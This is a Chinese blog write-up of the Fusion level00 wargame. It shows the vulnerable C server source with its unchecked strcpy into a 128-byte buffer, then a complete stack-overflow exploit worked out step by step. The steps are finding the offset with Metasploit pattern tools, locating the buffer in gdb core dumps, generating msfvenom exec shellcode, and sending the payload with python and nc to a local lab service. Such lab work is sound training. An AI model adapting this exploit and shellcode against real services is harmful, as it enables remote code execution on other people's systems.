侧边栏壁纸
博主头像
落叶人生博主等级

走进秋风,寻找秋天的落叶

  • 累计撰写 130562 篇文章
  • 累计创建 28 个标签
  • 累计收到 9 条评论
标签搜索

目 录CONTENT

文章目录
系统/网络安全

Fusion level00

2023-04-22 星期六 / 0 评论 / 0 点赞 / 70 阅读 / 7930 字

经过半个多月的时间把Protostar完成了,休息了几天,继续做Fusion。*********题外话开始**********在大学期间就在纠结是否选择程序猿的道路,结果因长时间高负荷写代码会引发不适

.

经过半个多月的时间把Protostar完成了,休息了几天,继续做Fusion。

*********题外话开始**********

在大学期间就在纠结是否选择程序猿的道路,结果因长时间高负荷写代码会引发不适而放弃了,不得不赞一下调好一个BUG时那种feel。如今,当完成一道题目也会有这种feel~~~~

*********题外话结束**********

level00源码:

#include "../common/common.c"int fix_path(char *path){ char resolved[128]; if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open strcpy(path, resolved);}char *parse_http_request(){ char buffer[1024]; char *path; char *q; printf("[debug] buffer is at 0x%08x :-)/n", buffer); if(read(0, buffer, sizeof(buffer)) <= 0) errx(0, "Failed to read from remote host"); if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request"); path = &buffer[4]; q = strchr(path, ' '); if(! q) errx(0, "No protocol version specified"); *q++ = 0; if(strncmp(q, "HTTP/1.1", 8) != 0) errx(0, "Invalid protocol"); fix_path(path); printf("trying to access %s/n", path); return path;}int main(int argc, char **argv, char **envp){ int fd; char *p; background_process(NAME, UID, GID); fd = serve_forever(PORT); set_io(fd); parse_http_request();}

Fusion的题目是Protostar的进阶版,难度也更难了,当然,level00还是个热身题。通过题目提示知道是个Stack问题,而且shellcode应该放在resolved之外。


既然是Stack问题,那就来个长点的字符串吧。

fusion@fusion:/opt/metasploit-framework/tools$ ./pattern_create.rb 150Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9fusion@fusion:~$ python -c "print 'GET /'+'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9' + ' HTTP/1.1'" | nc localhost 20000[debug] buffer is at 0xbf89b338 :-)

######################################################################

# 修改core文件生成路径的方法是: #

# sudo sh -c 'echo "/tmp/core.%t" > /proc/sys/kernel/core_pattern' #

######################################################################

通过gdb来查看core文件

fusion@fusion:/tmp$ sudo -s gdb --quiet --core=core.1368248639[sudo] password for fusion:[New LWP 2495]Core was generated by `./level00'.Program terminated with signal 11, Segmentation fault.#0  0x65413665 in ?? ()(gdb)

用pattern_offset.rb工具:

fusion@fusion:/opt/metasploit-framework/tools$ ./pattern_offset.rb 0x65413665139

由此可以得到溢出的字符修改EIP的位置在长度139的位置

接下来需要在输入中放进shellcode,通过core文件找到shellcode的位置。

fusion@fusion:~$ python -c "print 'GET /'+'a'*139 + '/xef/xbe/xad/xde' + ' HTTP/1.1' + '/x90'*100 + 'a'*100 " | nc localhost 20000[debug] buffer is at 0xbf89b338 :-)

***************

fusion@fusion:/tmp$ sudo -s gdb --core=core.1368255737GNU gdb (Ubuntu/Linaro 7.3-0ubuntu2) 7.3-2011.08Copyright (C) 2011 Free Software Foundation, Inc.License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>This is free software: you are free to change and redistribute it.There is NO WARRANTY, to the extent permitted by law.  Type "show copying"and "show warranty" for details.This GDB was configured as "i686-linux-gnu".For bug reporting instructions, please see:<http://bugs.launchpad.net/gdb-linaro/>.[New LWP 2833]Core was generated by `./level00'.Program terminated with signal 11, Segmentation fault.#0  0xdeadbeef in ?? ()(gdb) x/200x 0xbf89b3400xbf89b340:     0x61616161      0x61616161      0x61616161      0x616161610xbf89b350:     0x61616161      0x61616161      0x61616161      0x616161610xbf89b360:     0x61616161      0x61616161      0x61616161      0x616161610xbf89b370:     0x61616161      0x61616161      0x61616161      0x616161610xbf89b380:     0x61616161      0x61616161      0x61616161      0x616161610xbf89b390:     0x61616161      0x61616161      0x61616161      0x616161610xbf89b3a0:     0x61616161      0x61616161      0x61616161      0x616161610xbf89b3b0:     0x61616161      0x61616161      0x61616161      0x616161610xbf89b3c0:     0x61616161      0x61616161      0xdeadbeef      0x545448000xbf89b3d0:     0x2e312f50      0x90909031      0x90909090      0x909090900xbf89b3e0:     0x90909090      0x90909090      0x90909090      0x909090900xbf89b3f0:     0x90909090      0x90909090      0x90909090      0x909090900xbf89b400:     0x90909090      0x90909090      0x90909090      0x909090900xbf89b410:     0x90909090      0x90909090      0x90909090      0x909090900xbf89b420:     0x90909090      0x90909090      0x90909090      0x909090900xbf89b430:     0x90909090      0x90909090      0x61616190      0x616161610xbf89b440:     0x61616161      0x61616161      0x61616161      0x616161610xbf89b450:     0x61616161      0x61616161      0x61616161      0x616161610xbf89b460:     0x61616161      0x61616161      0x61616161      0x616161610xbf89b470:     0x61616161      0x61616161      0x61616161      0x616161610xbf89b480:     0x61616161      0x61616161      0x61616161      0x616161610xbf89b490:     0x0a616161      0x00000004      0xb77bc6e0      0x00000000


可以得到写的字符串从0xbf89b3d5开始记录。同样,在shellcode前面填充一些0x90。因此得到的payload格式应该是这样的:

GET /AAA……AA/x00/xb4/x89/xbf HTTP/1.10x90……0x90[SHELLCODE]

先获得一个shellcode:

fusion@fusion:/opt/metasploit-framework$ sudo -s ./msfvenom -p linux/x86/exec -f pl CMD="touch /tmp/fusion_for_zsz"[sudo] password for fusion:my $buf ="/x6a/x0b/x58/x99/x52/x66/x68/x2d/x63/x89/xe7/x68/x2f/x73" ."/x68/x00/x68/x2f/x62/x69/x6e/x89/xe3/x52/xe8/x1a/x00/x00" ."/x00/x74/x6f/x75/x63/x68/x20/x2f/x74/x6d/x70/x2f/x66/x75" ."/x73/x69/x6f/x6e/x5f/x66/x6f/x72/x5f/x7a/x73/x7a/x00/x57" ."/x53/x89/xe1/xcd/x80";


于是乎:

fusion@fusion:~$ python -c "print 'GET /'+'a'*139 + '/x10/xb4/x89/xbf' + ' HTTP/1.1' + '/x90'*100 + '/x6a/x0b/x58/x99/x52/x66/x68/x2d/x63/x89/xe7/x68/x2f/x73/x68/x00/x68/x2f/x62/x69/x6e/x89/xe3/x52/xe8/x1a/x00/x00/x00/x74/x6f/x75/x63/x68/x20/x2f/x74/x6d/x70/x2f/x66/x75/x73/x69/x6f/x6e/x5f/x66/x6f/x72/x5f/x7a/x73/x7a/x00/x57/x53/x89/xe1/xcd/x80' " | nc localhost 20000[debug] buffer is at 0xbf89b338 :-)fusion@fusion:/tmp$ lltotal 912drwxrwxrwt 4 root  root     340 2013-05-11 17:30 ./drwxr-xr-x 1 root  root     240 2013-05-11 22:50 ../-rw------- 1 root  20000 196608 2013-05-11 15:03 core.1368248639-rw------- 1 root  20000 196608 2013-05-11 15:33 core.1368250392-rw------- 1 root  20000 196608 2013-05-11 15:36 core.1368250571-rw------- 1 root  20000 196608 2013-05-11 15:41 core.1368250870-rw------- 1 root  20000 196608 2013-05-11 15:46 core.1368251166-rw------- 1 root  20000 196608 2013-05-11 15:51 core.1368251470-rw------- 1 root  20000 196608 2013-05-11 16:02 core.1368252121-rw------- 1 root  20000 196608 2013-05-11 17:02 core.1368255737-rw------- 1 root  20000 196608 2013-05-11 17:16 core.1368256578-rw------- 1 root  20000 196608 2013-05-11 17:16 core.1368256609-rw------- 1 root  20000 196608 2013-05-11 17:19 core.1368256755-rw------- 1 root  20000 196608 2013-05-11 17:24 core.1368257093-rw-r--r-- 1 20000 20000      0 2013-05-11 17:30 fusion_for_zszdrwxrwxrwt 2 root  root      40 2013-05-11 22:50 .ICE-unix/drwxrwxrwt 2 root  root      40 2013-05-11 22:50 .X11-unix/




.

赞一下 返回首页
本文链接: https://www.qiuyue.org/internet/system/63064.html
广告 广告

评论区